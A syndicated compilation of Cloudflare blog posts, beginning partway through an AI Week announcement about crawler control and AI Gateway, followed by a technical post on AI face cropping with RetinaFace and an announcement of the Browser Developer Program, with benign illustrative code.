We will be announcing new and powerful controls to detect Shadow AI and control unauthorized AI usage. Additionally, we’ve built options for teams to establish the “paved path” of AI tooling in an organization to supercharge employee productivity without sacrificing security. Finally, we’ll be announcing new ways of protecting your own models from poisoning or attacks.


Protecting original content from AI

The explosion of Large Language Models (LLMs) has also created a new challenge for content creators: the unauthorized scraping and training of their valuable content. Cloudflare recognizes the critical need for creators to maintain control over their intellectual property. That’s why we’ve introduced Crawl Control, a groundbreaking initiative designed to empower content owners to manage how their content is accessed and used by AI models.

In the past two months, we’ve seen incredible progress with Crawl Control. We’ve significantly expanded the number of participating content providers, allowing more creators to leverage this innovative protection. We’ve also refined our detection mechanisms to more accurately identify AI crawlers and ensure that only authorized access occurs. Furthermore, we’ve streamlined the integration process, making it easier for new publishers to onboard and begin protecting their content within minutes. Our goal remains to provide content creators with the tools they need to thrive in the age of AI, ensuring they are compensated and acknowledged for the content they produce.
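As a much simpler illustration of the underlying idea (not how Crawl Control detects crawlers, which relies on more signals than a self-reported header), a Worker could match the `User-Agent` header against tokens that some AI crawler operators publish. The token list is a small, assumed sample that will go stale, and `isKnownAiCrawler` and `handle` are hypothetical names.

```typescript
// A small sample of user-agent tokens published by AI crawler operators.
const AI_CRAWLER_TOKENS = ["GPTBot", "ClaudeBot", "CCBot", "PerplexityBot"];

// True if the User-Agent contains one of the known tokens (case-insensitive).
function isKnownAiCrawler(userAgent: string | null): boolean {
  if (!userAgent) return false;
  const ua = userAgent.toLowerCase();
  return AI_CRAWLER_TOKENS.some((token) => ua.includes(token.toLowerCase()));
}

// Worker-style handler: block matching crawlers, pass everything else through.
async function handle(request: Request, origin: (r: Request) => Promise<Response>): Promise<Response> {
  if (isKnownAiCrawler(request.headers.get("user-agent"))) {
    return new Response("AI crawling is not permitted on this site.", { status: 403 });
  }
  return origin(request);
}
```

Because any client can set this header, a check like this only stops well-behaved crawlers, which is why detection based on verified bot signals and behavior matters.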


Helping you build world-class, secure, AI experiences

We believe that AI experiences should have security controls by default. This is why we are heavily investing in both our developer platform’s AI Gateway and the associated security controls for those products. This two-pronged approach lets developers iterate on and test new ideas without fear of painful or embarrassing security issues.

The Cloudflare AI Gateway allows developers to deploy AI-driven applications with unparalleled speed and efficiency, ensuring that these applications are as close to end-users as possible. This proximity minimizes latency and maximizes performance, delivering a seamless and responsive user experience that is critical in today’s fast-paced digital landscape.

This week, we’re announcing significant enhancements to the AI Gateway, further solidifying its position as the premier platform for AI application deployment. These improvements include advanced caching mechanisms that reduce redundant model calls, leading to faster response times and lower operational costs. We are also introducing expanded observability features, providing developers with deeper insights into their AI model’s performance and usage patterns, which will enable more effective debugging and optimization. Furthermore, new integrations with popular AI frameworks and services will simplify the development workflow, allowing developers to leverage the AI Gateway’s benefits with even greater ease. Our commitment is to provide developers with the tools to innovate and deliver cutting-edge AI experiences to their users.
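In general terms, caching redundant model calls means reusing a stored response when the same model receives identical inputs. The sketch below is a generic in-memory illustration of that idea, not AI Gateway’s implementation or API; `withCache`, the key scheme, and the time-to-live are assumptions.

```typescript
type ModelCall = (model: string, inputs: Record<string, unknown>) => Promise<unknown>;

interface Entry {
  value: unknown;
  expiresAt: number;
}

// Wrap a model call so identical (model, inputs) pairs are served from memory.
function withCache(call: ModelCall, ttlMs: number, now: () => number = Date.now): ModelCall {
  const cache = new Map<string, Entry>();
  return async (model, inputs) => {
    // JSON.stringify is key-order sensitive; callers should build inputs consistently.
    const key = `${model}:${JSON.stringify(inputs)}`;
    const hit = cache.get(key);
    if (hit && hit.expiresAt > now()) return hit.value;

    const value = await call(model, inputs);
    cache.set(key, { value, expiresAt: now() + ttlMs });
    return value;
  };
}
```

Injecting `now` makes expiry testable without waiting; a production cache would also need eviction and a shared store rather than per-isolate memory.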

Making Cloudflare better with AI 

We’re integrating AI across our entire product suite to enhance the Cloudflare experience itself. From intelligent threat detection that adapts to emerging attack patterns, to AI-powered optimizations that fine-tune network performance, our goal is to leverage AI to make our platform more intuitive, efficient, and secure. We envision a future where Cloudflare’s products proactively anticipate user needs, automate complex tasks, and deliver unparalleled insights, all powered by seamlessly embedded AI. This commitment to internal AI integration ensures that as the digital landscape evolves, Cloudflare remains at the forefront of innovation, continuously delivering superior value to our users.

We cannot wait to share these updates and announcements with you. Follow our AI Week hub page for all the latest releases from our blog and CloudflareTV.


How we built AI face cropping for Images

Post Syndicated from Deanna Lam original https://blog.cloudflare.com/ai-face-cropping-for-images/

During Developer Week 2024, we introduced AI face cropping in private beta. This feature automatically crops images around detected faces, and marks the first release in our upcoming suite of AI image manipulation capabilities.

AI face cropping is now available in Images for everyone. To bring this feature to general availability, we moved our CPU-based prototype to a GPU-based implementation in Workers AI, enabling us to address a number of technical challenges, including memory leaks that could hamper large-scale use.


Photograph by Suad Kamardeen (@suadkamardeen) on Unsplash

Turning raw images into production-ready assets

We developed face cropping with two particular use cases in mind:

Social media platforms and AI chatbots. We observed a lot of traffic from customers who use Images to turn unedited images of people into smaller profile pictures in neat, fixed shapes.

E-commerce platforms. The same product photo might appear in a grid of thumbnails on a gallery page, then again on an individual product page with a larger view. The following example illustrates how cropping can change the emphasis from the model’s shirt to their sunglasses.


Photograph by Media Modifier (@mediamodifier) on Unsplash

When handling high volumes of media content, preparing images for production can be tedious. With Images, you don’t need to manually generate and store multiple versions of the same image. Instead, we serve copies of each image, each optimized to your specifications, while you continue to store only the original image.

Crop everything, everywhere, all at once

Cloudflare provides a library of parameters to manipulate how an image is served to the end user. For example, you can crop an image to a square by setting its width and height dimensions to 100×100.

By default, images are cropped toward the center coordinates of the original image. The gravity parameter can affect how an image gets cropped by changing its focal point. You can specify coordinates to use as the focal point of an image or allow Cloudflare to automatically determine a new focal point.


The gravity parameter is useful when cropping images with off-centered subjects. Photograph by Andrew Small (@andsmall) on Unsplash

The gravity=auto option uses a saliency algorithm to pick the optimal focal point of an image. Saliency detection identifies the parts of an image that are most visually important; the cropping operation is then applied toward this region of interest. Our algorithm analyzes images using visual cues such as color, luminance, and texture, but doesn’t consider context within an image. While this setting works well on images with inanimate objects like plants and skyscrapers, it doesn’t reliably account for subjects as contextually meaningful as people’s faces.

And yet, images of people comprise the majority of bandwidth usage for many applications, such as an AI chatbot platform that uses Images to serve over 45 million unique transformations each month. This presented an opportunity for us to improve how developers can optimize images of people.

AI face cropping can be performed by using the gravity=face option, which automatically detects which pixels represent the face (or faces) and uses this information to crop the image. You can also affect how closely the image is cropped toward the face; the zoom parameter controls the threshold for how much of the surrounding area around the face will be included in the image.
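As a rough illustration of how these parameters combine, the sketch below builds a transformation URL. It assumes Cloudflare’s `/cdn-cgi/image/<options>/<source>` URL format with comma-separated `key=value` options, and it adds `fit=crop`, which this post does not mention; the zone `example.com`, the image path, and the `transform_url` helper are hypothetical. Check the Images transformation documentation for the exact option set before relying on it.

```python
def transform_url(zone: str, source_path: str, **options) -> str:
    """Build a transformation URL in the assumed form
    https://<zone>/cdn-cgi/image/<options>/<source-path>."""
    # Serialize options as comma-separated key=value pairs, keeping call order.
    opts = ",".join(f"{key}={value}" for key, value in options.items())
    return f"https://{zone}/cdn-cgi/image/{opts}/{source_path.lstrip('/')}"


# Square 100x100 crop centered on the detected face(s), with some margin.
url = transform_url(
    "example.com",
    "/images/portrait.jpg",
    width=100,
    height=100,
    fit="crop",
    gravity="face",
    zoom=0.5,
)
```

Swapping `gravity="face"` for `gravity="auto"` would fall back to the saliency-based focal point described above.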

We carefully designed our model pipeline with privacy and confidentiality top of mind. This feature doesn’t support facial identification or recognition. In other words, when you optimize with Cloudflare, we’ll never know that two different images depict the same person, or identify the specific people in a given image. Instead, AI face cropping with Images is intentionally limited to face detection, or identifying the pixels that represent a human face.

From pixels to people

Our first step was to select an open-source model that met our requirements. Behind the scenes, our AI face cropping uses RetinaFace, a convolutional neural network model that detects human faces in images and locates them.

A neural network is a type of machine learning model that loosely resembles how the human brain works. A basic neural network has three parts: an input layer, one or more hidden layers, and an output layer. Nodes in each layer form an interconnected network to transmit and process data, where each node is connected to nodes in the next layer.


A fully connected layer passes data from one layer to the next.

Data enters through the input layer and is passed to the first hidden layer. The hidden layers perform the computation, and the result is delivered through the output layer.
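To make the layer-by-layer flow concrete, here is a minimal fully connected network in plain Python. The weights, the ReLU and sigmoid activations, and the 3-2-1 layer sizes are arbitrary choices for illustration; this is not RetinaFace or any trained model.

```python
import math


def dense_layer(inputs, weights, biases):
    """One fully connected layer: every input feeds every output node."""
    outputs = []
    for node_weights, bias in zip(weights, biases):
        # Weighted sum of all inputs plus a bias, passed through a ReLU activation.
        total = sum(w * x for w, x in zip(node_weights, inputs)) + bias
        outputs.append(max(0.0, total))
    return outputs


def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))


def forward(inputs):
    # Hidden layer: 3 inputs -> 2 nodes, with hand-picked (untrained) weights.
    hidden = dense_layer(inputs, [[0.5, -0.2, 0.1], [0.3, 0.8, -0.5]], [0.0, 0.1])
    # Output layer: a single score squashed into (0, 1).
    score = sum(w * h for w, h in zip([1.2, -0.7], hidden)) + 0.05
    return sigmoid(score)


probability = forward([1.0, 0.5, 0.2])
```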

A convolutional neural network (CNN) mirrors how humans look at things. When we look at other people, we start with abstract features, like the outline of their body, before we process specific features, like the color of their eyes or the shape of their lips.

Similarly, a CNN processes an image piece-by-piece before delivering the final result. Earlier layers look for simple features like edges, colors, and lines; subsequent layers become more complex and are each responsible for identifying the various features that comprise a human face. The last fully connected layer combines all categorized features to produce one final classification of the entire image. In other words, if an image contains all of the individual features that define a human face (e.g. eyes, nose), then the CNN concludes that the image contains a human face.
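The sliding-window operation at the heart of a CNN layer can be sketched in a few lines. This toy example applies a hand-picked Sobel-style kernel to find a vertical edge; in a real CNN such as RetinaFace, kernel values are learned during training rather than chosen by hand, and each layer applies many kernels.

```python
def convolve2d(image, kernel):
    """'Valid' 2D convolution (no padding), as used in CNN layers.
    Like most deep learning libraries, this is technically cross-correlation:
    the kernel is not flipped."""
    kh, kw = len(kernel), len(kernel[0])
    out_h = len(image) - kh + 1
    out_w = len(image[0]) - kw + 1
    out = [[0.0] * out_w for _ in range(out_h)]
    for i in range(out_h):
        for j in range(out_w):
            # Slide the kernel over the image and sum the element-wise products.
            out[i][j] = sum(
                kernel[a][b] * image[i + a][j + b]
                for a in range(kh)
                for b in range(kw)
            )
    return out


# Responds strongly where brightness changes from left to right.
SOBEL_X = [[-1, 0, 1], [-2, 0, 2], [-1, 0, 1]]

# Toy 4x5 grayscale image: dark on the left, bright on the right.
image = [[0, 0, 10, 10, 10] for _ in range(4)]
edges = convolve2d(image, SOBEL_X)
```

The output is large only in the windows that straddle the dark-to-bright boundary and zero over the uniform bright region, which is the kind of low-level signal later layers build on.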

We needed a model that could determine whether an image depicts a person (image classification), as well as exactly where they are in the image (object detection). When selecting a model, some factors we considered were:

  • Performance on the WIDERFACE dataset. This is a widely used face detection benchmark, which contains 32,203 images of 393,703 labeled faces with a high degree of variability in scale, pose, and occlusion.

  • Speed (in frames per second). Most of our image optimization requests occur on delivery (rather than before an image gets uploaded to storage), so we prioritized performance for end-user delivery.

  • Model size. Smaller model sizes run more efficiently.

  • Quality. The performance boost from smaller models often comes at the cost of quality; the key is balancing speed with results.

Our initial test sample contained 500 images with varying factors like the number of faces in the image, face size, lighting, sharpness, and angle. We tested various models, including BlazeFace, R-CNN (and its successors Fast R-CNN and Faster R-CNN), RetinaFace, and YOLO (You Only Look Once).

Two-stage detectors like R-CNN and its successors propose potential object locations in an image, then identify objects in those regions of interest. One-stage detectors like RetinaFace and YOLO predict object locations and classes in a single pass. In our research, we observed that two-stage detectors provided higher accuracy but performed too slowly to be practical for real traffic. One-stage detectors, on the other hand, were efficient and performant while still highly accurate.

Ultimately, we selected RetinaFace, which showed the highest precision (99.4%) and performed faster than other models with comparable precision. We found that RetinaFace delivered strong results even with images containing multiple blurry faces:


Photograph by Anne Nygård (@polarmermaid) on Unsplash

Inference, the process of using a trained model to make predictions, can be computationally demanding, especially with very large images. To maintain efficiency, we set a maximum size limit of 1024×1024 pixels when sending images to the model.

We pass images within these dimensions directly to the model for analysis. But if either width or height dimension exceeds 1024 pixels, then we instead create an inference image to send to the model; this is a smaller copy that retains the same aspect ratio as the original image and does not exceed 1024 pixels in either dimension. For example, a 125×2000 image will be downscaled to 64×1024. Creating this resized, temporary version reduces the amount of data that the model needs to analyze, enabling faster processing.
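The resizing rule for inference images can be expressed as a small function. This is a sketch under assumptions: the `inference_size` name is hypothetical, and the post does not say how fractional pixel sizes are rounded, so rounding to the nearest integer here is a guess.

```python
MAX_INFERENCE_DIM = 1024  # size limit for images sent to the face detector


def inference_size(width: int, height: int, limit: int = MAX_INFERENCE_DIM) -> tuple[int, int]:
    """Return the dimensions of the image sent to the face detection model."""
    if width <= limit and height <= limit:
        # Small enough: the original image is passed to the model as-is.
        return width, height
    # Scale so the longer side equals the limit, preserving the aspect ratio.
    longest = max(width, height)
    return max(1, round(width * limit / longest)), max(1, round(height * limit / longest))
```

For example, `inference_size(125, 2000)` yields the 64×1024 inference image from the text, while an 800×600 image is passed through unchanged.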

The model draws all of the bounding boxes, or the regions within an image that define the detected faces. From there, we construct a new, outer bounding box that encompasses all of the individual boxes, calculating its top-left and bottom-right points based on the boxes that are closest to the top, left, bottom, and right edges of the image.

The top-left point uses the x coordinate from the left-most box and the y coordinate from the top-most box. Similarly, the bottom-right point uses the x coordinate from the right-most box and the y coordinate from the bottom-most box. These coordinates can be taken from the same bounding boxes; if a single box is closest to both the top and left edges, then we would use its top-left corner as the top-left point of the outer bounding box.


AI face cropping identifies regions that represent faces, then determines an outer bounding box and focal point based on the top-most, left-most, right-most, and bottom-most bounding boxes.

Once we define the outer bounding box, we use its center coordinates as the focal point when cropping the image. From our experiments, we found that this produced better and more balanced results for images with multiple faces compared to other methods, like establishing the new focal point around the largest detected face.
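The outer bounding box and its center can be computed with a few `min` and `max` calls. This sketch assumes boxes are given as `(x1, y1, x2, y2)` pixel coordinates with the origin at the top-left; the `Box` type, the example face boxes, and the choice to raise an error when no faces are found are illustrative, since the post does not describe that case.

```python
from typing import NamedTuple, Sequence


class Box(NamedTuple):
    # (x1, y1) is the top-left corner, (x2, y2) the bottom-right corner.
    x1: float
    y1: float
    x2: float
    y2: float


def outer_box(boxes: Sequence[Box]) -> Box:
    """Smallest box that encloses every detected face."""
    if not boxes:
        raise ValueError("no faces detected")
    return Box(
        min(b.x1 for b in boxes),  # x from the left-most box
        min(b.y1 for b in boxes),  # y from the top-most box
        max(b.x2 for b in boxes),  # x from the right-most box
        max(b.y2 for b in boxes),  # y from the bottom-most box
    )


def focal_point(box: Box) -> tuple[float, float]:
    """Center of the outer box, used as the focal point for cropping."""
    return (box.x1 + box.x2) / 2, (box.y1 + box.y2) / 2


# Two hypothetical face detections.
faces = [Box(100, 200, 180, 300), Box(400, 150, 470, 240)]
box = outer_box(faces)
center = focal_point(box)
```

Here the top-left point takes its x from the first face and its y from the second, matching the mixed-corner case described above.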

The cropped image area is calculated based on the dimensions of the outer bounding box (“d”) and a specified zoom level (“z”) in the formula (1 ÷ z) × d. The zoom parameter accepts floating-point values between 0 and 1, where we crop the image to the bounding box when zoom=1 and include more of the area around the box as zoom approaches 0.

Consider an original image that is 2048×2048. First, we create an inference image that is 1024×1024 to meet our size limits for face detection. Second, we define the outer bounding box using the model’s predictions; we’ll use 100×500 for this example. At zoom=0.5, our formula generates a crop area that is twice as large as the bounding box, with new width (“w”) and height (“h”) dimensions of 200×1000.
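With d_w and d_h as the width and height of the outer bounding box and z as the zoom level, the expansion step in this example works out as follows:

```latex
\begin{align*}
(w,\ h) &= \left(\tfrac{1}{z}\, d_w,\ \tfrac{1}{z}\, d_h\right) \\
        &= \left(\tfrac{100}{0.5},\ \tfrac{500}{0.5}\right) = (200,\ 1000)
        \qquad \text{for } z = 0.5,\ d_w \times d_h = 100 \times 500
\end{align*}
```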


We also apply a min function that chooses the smaller number between the input dimensions and the calculated dimensions, ensuring that the new width and height never exceed the dimensions of the image itself. In other words, if you try to zoom out too much, then we use the full width or height of the image instead of defining a crop area that will extend beyond the edge of the image. For example, at zoom=0.25, our formula yields an initial crop area of 400×2000. Here, since the calculated height (2000) is larger than the input height (1024), we use the input height to set the crop area to 400×1024.

Finally, we need to scale the crop area back to the size of the original image. This applies only when a smaller inference image is created.

We initially downscaled the original 2048×2048 image by a factor of 2 to create the 1024×1024 inference image. This means that we need to multiply the dimensions of the crop area—400×1024 in our latest example—by 2 to produce our final result: a cropped image that is 800×2048.
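Putting the three steps together (zoom expansion, clamping to the image, and scaling back to the original), a sketch of the crop-size calculation might look like this. The `crop_area` name and signature are hypothetical, and rejecting `zoom=0` is an assumption, since the formula would divide by zero and the post only says zoom ranges between 0 and 1. Positioning the crop around the focal point is left out.

```python
def crop_area(box_w, box_h, zoom, inf_w, inf_h, orig_w, orig_h):
    """Crop size in original-image pixels, following the steps described above."""
    if not 0 < zoom <= 1:
        raise ValueError("zoom must be in (0, 1]")
    # 1. Expand the outer bounding box: (1 / z) x d.
    w = box_w / zoom
    h = box_h / zoom
    # 2. Never extend beyond the edges of the (inference) image.
    w = min(w, inf_w)
    h = min(h, inf_h)
    # 3. Scale back up if a smaller inference image was used (factor 1 otherwise).
    return w * (orig_w / inf_w), h * (orig_h / inf_h)


# The zoom=0.25 example: 400x2000 is clamped to 400x1024, then doubled.
final = crop_area(100, 500, 0.25, 1024, 1024, 2048, 2048)
```

With the numbers from the example, `final` is the 800×2048 crop described above; at zoom=0.5 the 200×1000 area fits inside the inference image and scales to 400×2000.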

The architecture behind the earliest build

In the beta version, we rewrote the model using TensorFlow Rust to make it compatible with our existing Rust-based stack. All of the computations for inference—where the model classifies and locates human faces—were executed on CPUs within our network.

Initially, this worked well and we saw near-realtime results.

However, the underlying limitations of our implementation became apparent when we started receiving consistent alerts that our underlying Images service was nearing its limits for memory usage. The increased memory usage didn’t line up with any recent deployments around this time, but a hunch led us to discover that the face cropping compute time graph had an uptick that matched the uptick in memory usage. Further tracing confirmed that AI face cropping was at the root of the problem.

When a host runs out of memory, the operating system terminates processes to free up memory and prevent the system from crashing. Because our CPU-based implementation shared RAM with other processes, this could cause errors in other image optimization operations. In response, we switched our memory allocator from glibc malloc to jemalloc, which reduced our memory usage at runtime and saved about 20 TiB of RAM globally. We also started reducing the number of face cropping requests we processed to limit CPU usage.

At this point, AI face cropping was already limited to our own internal uses and a small number of beta customers. These steps only temporarily reduced our memory consumption. They weren’t sufficient for handling global traffic, so we looked toward a more scalable design for long-term use.

Doing more with less (memory)

With memory usage alerts looming in the distance, it became clear that we needed to move to a GPU-based approach.

Unlike with CPUs, a GPU-based implementation avoids contention with other processes because memory access is typically dedicated and managed more tightly. We partnered with the Workers AI team, who created a framework for internal teams to integrate payloads into their model catalog for GPU access.

Some Workers AI models have their own standalone containers; this isn’t practical for every model, as routing traffic to multiple containers can be expensive. When using a GPU through Workers AI, the data needs to travel over the network, which can introduce latency. This is where model size is especially relevant, as network transport overhead becomes more noticeable with larger models.

To address this, Workers AI wraps smaller models in a single container and uses a latency-sensitive routing algorithm to identify the best instance to serve each payload. Models can also be offloaded when they receive no traffic.


A scheduler is used to optimize how—and when—models in the same container interact with GPUs.

RetinaFace runs on 1 GB of VRAM on the smallest GPU; it’s small enough to be hot-swapped at runtime alongside similarly sized models. When a request for the RetinaFace model arrives, its Python code is loaded into the environment and executed.
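The post does not describe how the Workers AI scheduler decides which models stay on a GPU. As a purely hypothetical illustration of hot swapping within a fixed VRAM budget, the toy cache below loads a model on its first request and offloads the least recently used models when space runs out. The LRU policy, the 4 GB budget, the `ModelCache` class, and the other model names are assumptions; only RetinaFace’s 1 GB footprint comes from the text.

```python
from collections import OrderedDict


class ModelCache:
    """Toy hot-swapping cache for one GPU with a fixed VRAM budget."""

    def __init__(self, vram_budget_gb: float):
        self.budget = vram_budget_gb
        self.resident = OrderedDict()  # model name -> VRAM footprint in GB

    def used(self) -> float:
        return sum(self.resident.values())

    def request(self, name: str, size_gb: float) -> bool:
        """Serve a request; returns True if the model had to be loaded first."""
        if name in self.resident:
            self.resident.move_to_end(name)  # mark as most recently used
            return False
        if size_gb > self.budget:
            raise ValueError(f"{name} does not fit on this GPU")
        # Offload least recently used models until the new one fits.
        while self.used() + size_gb > self.budget:
            self.resident.popitem(last=False)
        self.resident[name] = size_gb  # stand-in for loading code and weights
        return True


cache = ModelCache(vram_budget_gb=4.0)
cache.request("retinaface", 1.0)  # loaded
cache.request("model-b", 2.0)     # loaded
cache.request("retinaface", 1.0)  # already resident, no reload
cache.request("model-c", 2.0)     # offloads model-b, the least recently used
```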

As expected, we saw a significant drop in memory usage after we moved the feature to Workers AI. Now, each instance of our Images service consumes about 150 MiB of memory.


With this new approach, memory leaks pose less concern to the overall availability of our service. Workers AI executes models within containers, so they can be terminated and restarted as needed without impacting other processes. Since face cropping runs separately from our Images service, restarting it won’t halt our other image optimization operations.

Applying AI face cropping to our blog

As part of our beta launch, we updated the Cloudflare blog to apply AI face cropping on author images.

Authors can submit their own images, which appear as circular profile pictures in both the main blog feed and individual blog posts. By default, CSS centers images within their containers, making off-centered head positions more obvious. When two profile pictures include different amounts of negative space, this can also lead to a visual imbalance where authors’ faces appear at different scales:


AI face cropping makes posts with multiple authors appear more balanced.

In the example above, Austin’s original image is cropped tightly around his face. On the other hand, Taylor’s original image includes his torso and a larger margin of the background. As a result, Austin’s face appears larger and closer to the center than Taylor’s does. After we applied AI face cropping to profile pictures on the blog, their faces appear more similar in size, creating more balance and cohesion on their co-authored post.

A new era of image editing, now in Images

Many developers already use Images to build scalable media pipelines. Our goal is to accelerate image workflows by automating rote, manual tasks.

For the Images team, this is only the beginning. We plan to release new AI capabilities, including features like background removal and generative upscale. You can try AI face cropping for free by enabling transformations in the Images dashboard.

Announcing the Cloudflare Browser Developer Program

Post Syndicated from Sally Lee original https://blog.cloudflare.com/announcing-the-cloudflare-browser-developer-program/

Today, we are announcing Cloudflare’s Browser Developer Program, a collaborative initiative to strengthen partnership between Cloudflare and browser development teams.

Browser developers can apply to join here

At Cloudflare, we aim to help build a better Internet. One way we achieve this is by providing website owners with the tools to detect and block unwanted traffic from bots through Cloudflare Challenges or Turnstile. As both bots and our detection systems become more sophisticated, the security checks required to validate human traffic become more complicated. While we aim to strike the right balance, we recognize these security measures can sometimes cause issues for legitimate browsers and their users.

Building a better web together

A core objective of the program is to provide a space for intentional collaboration where we can work directly with browser developers to ensure that both accessibility and security can co-exist. We aim to support the evolving browser landscape, while upholding our responsibility to our customers to deliver the best security products. This program provides a dedicated channel for browser teams to share feedback, report issues, and help ensure that Cloudflare’s Challenges and Turnstile work seamlessly with all browsers.

What the program includes

Browser developers in the program will benefit from:

  • A two-way communication channel to Cloudflare’s team dedicated to addressing browser-specific concerns, feedback, and issues.

  • Best practices for building and testing against Cloudflare Challenges and Turnstile.

  • A private community forum for updates, questions, and discussion between browser developers and Cloudflare engineers. 

  • Early visibility into updates or changes that may impact how your browser handles Cloudflare Challenges.

  • (If applicable) Testing integration where we will incorporate your browser into our testing pipeline and monitor its performance with our releases.

This program is designed as a partnership where Cloudflare will make a best effort to ensure our security products work properly with all browsers, while giving browser developers a voice in how these systems evolve. As an output of this program, we expect to publish clear browser requirements for running Cloudflare Challenges that strike a balance between openness and security.

For end users browsing the web, we continue to support a wide range of browsers. We will continue to update this list based on the insights and collaborations from the Browser Developer Program. We are also committed to ensuring our Challenge interstitial pages and Turnstile provide clear, actionable UI/UX for any error or failed states, making it easier for you to understand and resolve issues you may encounter. 

How to apply

If you are working on a browser and want to ensure your users have a seamless experience with Cloudflare-protected websites, we encourage you to apply here.

We’ll ask for basic information about your project and ask you to sign our Browser Developer Program Agreement. In addition, we expect participants to adhere to our Community Code of Conduct and commit to constructive engagement.

Once you’re accepted, you’ll be invited to a private space in the Cloudflare Community where you can engage directly with our team. 

Why is this important?

Cloudflare Challenges, a security mechanism to verify whether a visitor is a human or a bot, serve a wide variety of browsers in the world today. Chrome leads with 68.0%, followed by Safari at 8.7%, Firefox at 6.3%, Opera at 6.2%, and Edge at 4.8%. However, a very long tail of browsers makes up the remaining traffic; each represents less than 1% individually, but together they paint a picture of an incredibly diverse web ecosystem.


Browser traffic distribution, with 100+ browsers comprising the ‘Other’ category

This diversity spans a wide range of environments, each with unique constraints and capabilities:

  • Emerging and experimental browsers pushing the boundaries of web technology

  • Privacy-focused browsers such as DuckDuckGo that prioritize user data protection

  • Embedded browsers inside social media apps like Facebook, Instagram, and TikTok

  • WebViews used by mobile applications

  • Gaming and VR browsers such as Oculus for headsets and gaming consoles

  • Smart device browsers built into classroom displays and home appliances

Supporting this level of diversity poses real engineering challenges. Many of these browsers deviate from standard assumptions. Some lack full support for modern Web APIs, others operate under more stringent data privacy policies, and some are optimized for environments where our script to verify visitors may be hindered or blocked from running properly. These browsers are not bad or malicious. But their behavior may fall outside the typical patterns observed in mainstream browsers, which can lead to problematic or failed Challenge flows which we would like to avoid.

From an engineering perspective, our job is to strike a difficult balance. If our logic is so rigid that it expects only the behaviors of the majority, we risk excluding legitimate users on less conventional platforms. But if we relax our standards too much, we increase the attack surface for abuse. We cannot overfit to the top 5 browsers, nor can we afford to treat all clients as equal in capability or trustworthiness.

The Browser Developer Program is one way to close this gap. By working directly with browser teams, especially those building for niche or emerging environments, we can better understand the constraints they operate under and collaborate to make each of our systems more compatible and resilient. 

Join us!

This program is free to join, and is open to any browser developer, no matter the size or the lifecycle stage. Our goal is to listen, learn, and collaborate with browser developers to create a better experience for everyone. 

We believe this program will ultimately benefit end users the most. By joining this program, you will help us build solutions that prioritize both the security needs of businesses as well as the diverse ways people access the Internet. 

We look forward to your participation!